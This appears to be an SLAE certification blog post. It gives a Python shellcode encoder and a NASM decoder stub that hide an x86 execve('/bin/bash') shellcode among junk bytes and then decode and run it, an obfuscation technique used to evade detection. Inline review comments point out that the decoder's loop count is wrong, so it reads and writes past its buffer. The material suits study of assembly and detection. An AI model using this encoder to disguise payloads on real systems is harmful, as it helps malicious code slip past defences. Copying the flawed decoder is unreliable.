Source: SecurityTube
Ok, here I will show a simple encoder/decoder; the source code can be found on GitHub.
How the encoder works:
- Get a random number between 1 and 3 (link to python encoder script)
- After each shellcode byte, add the control number, then add the junk bytes
Example:
------------------------------------------------------------------
| G | C | J | J | G | C | J | J | J | G |
------------------------------------------------------------------
G - good byte, shellcode byte
C - control number, tells the decoder how many bytes to skip to reach the next good byte
J - Junk bytes
#!/usr/bin/python
from random import randint
#30 bytes
#shellcode - execve stack version
def get_random(ident):
    """Return one random integer for the encoder.

    ident == 'number' -> control byte in [1, 3] (distance to the next good byte)
    ident == 'char'   -> junk byte in [65, 122], i.e. ASCII 'A'..'z' which also
                         covers the characters [ \\ ] ^ _ `
    Any other ident returns None (no range is defined for it).
    """
    ranges = {'number': (1, 3), 'char': (65, 122)}
    bounds = ranges.get(ident)
    if bounds is None:
        return None
    lo, hi = bounds
    return randint(lo, hi)
# The 30-byte payload being encoded ("execve stack version" per the note above).
shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

# Build the encoded stream as "\xNN" tokens; one good byte, one control byte,
# then (control - 1) junk bytes, so that &control + control == &next_good.
pieces = []
for good in bytearray(shellcode):
    pieces.append('\\x%02x' % good)
    ctrl = get_random('number')
    pieces.append('\\x%02x' % ctrl)
    pieces.extend('\\x%02x' % get_random('char') for _ in range(ctrl - 1))
encoded = "".join(pieces)
# A fixed terminator ("\\xf0\\x0d") was considered for the decoder's jump but is not emitted.

print encoded
print
print encoded.replace("\\x", ",0x")[1:]
# Every token is 4 characters wide, so len(encoded)/4 is the encoded byte count.
print 'Initial len: %d, encoded len: %d' % (len(shellcode), len(encoded)/4)
Decoder.nasm
;-----------------------------------------------------------------------
; Decoder stub for the "good byte / control byte / junk" stream produced
; by the Python encoder above.
; Target: x86 32-bit Linux (int 0x80 syscalls), NASM syntax.
; Blob layout at `shelcode`:  G C J.. G C J.. ...
;   G = original byte; C = distance (1..3) from C's own address to the
;   next G; C-1 junk bytes follow C.
; The stub decodes in place (G_k is written to shelcode[k]) and then
; calls the decoded bytes.
; NOTE(review): in-place decoding writes into the same section the code
; lives in; this only works if that page is writable at runtime. The
; build/link flags are not shown on this page — confirm them.
;-----------------------------------------------------------------------
section .text
global _start
_start:
jmp short end ; jmp-call-pop: `end:` does `call decoder`, leaving &shelcode on the stack
decoder:
xor eax, eax ; clear all four registers: only al/bl/cl are written below,
xor ebx, ebx ; so the upper bits must start at zero
xor edx, edx
xor ecx, ecx
pop edx ; edx = return address pushed by `call decoder` = address of shelcode
push edx ; put it back so `pop ecx` after the loop can reach it
mov esi, edx ; esi = destination pointer (where decoded bytes are stored)
mov edi, edx ; edi = source pointer (walks the encoded stream)
inc esi ; shelcode[0] is already a good byte; first store goes to shelcode[1]
inc edi ; edi -> first control byte
mov cl, 89 ; loop count; 89 is the ENCODED length of the blob below.
; NOTE(review): each iteration decodes exactly one byte, so only
; (decoded length - 1) = 29 iterations are needed for the 30-byte payload.
; With 89, iterations 30..89 keep walking edi past the end of the blob,
; using whatever bytes follow as distances, and the last store through
; esi lands at shelcode+89, one byte past the 89-byte blob. The count
; should be the decoded length minus one, not the encoded length.
restore: ; decode loop. Invariant: edi -> a control byte, esi -> its output slot
xor eax, eax ; al/bl are loaded with byte-sized moves; keep the upper bits zero
xor ebx, ebx
mov al, byte [edi] ; al = C, distance to the next good byte
add eax, edi ; eax = &C + C = address of the next good byte
mov bl, byte [eax] ; bl = that good byte
mov byte [esi], bl ; store it at its decoded position
mov edi, eax ; edi = address of the good byte just copied
inc edi ; edi -> the control byte that follows it
inc esi ; esi -> next output slot
loop restore ; ecx--; repeat while ecx != 0
pop ecx ; ecx = address of shelcode (pushed back above)
call ecx ; run the decoded bytes
xor eax, eax ; if they return: sys_exit(0)  (eax = 1, ebx = 0)
mov al, 1
xor ebx,ebx
int 0x80
end:
call decoder ; pushes the address of the byte after this call, i.e. shelcode
shelcode: db 0x31,0x01,0xc0,0x03,0x7a,0x6b,0x50,0x03,0x76,0x50,0x68,0x02,0x4f,0x62,0x03,0x6c,0x49,0x61,0x01,0x73,0x01,0x68,0x02,0x54,0x68,0x01,0x62,0x03,0x5e,0x7a,0x69,0x01,0x6e,0x01,0x2f,0x03,0x54,0x48,0x68,0x01,0x2f,0x03,0x47,0x4d,0x2f,0x01,0x2f,0x01,0x2f,0x01,0x89,0x03,0x4a,0x62,0xe3,0x01,0x50,0x02,0x42,0x89,0x02,0x63,0xe2,0x02,0x62,0x53,0x03,0x4f,0x41,0x89,0x01,0xe1,0x03,0x72,0x5b,0xb0,0x03,0x48,0x66,0x0b,0x02,0x61,0xcd,0x02,0x4f,0x80,0x03,0x41,0x4e
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: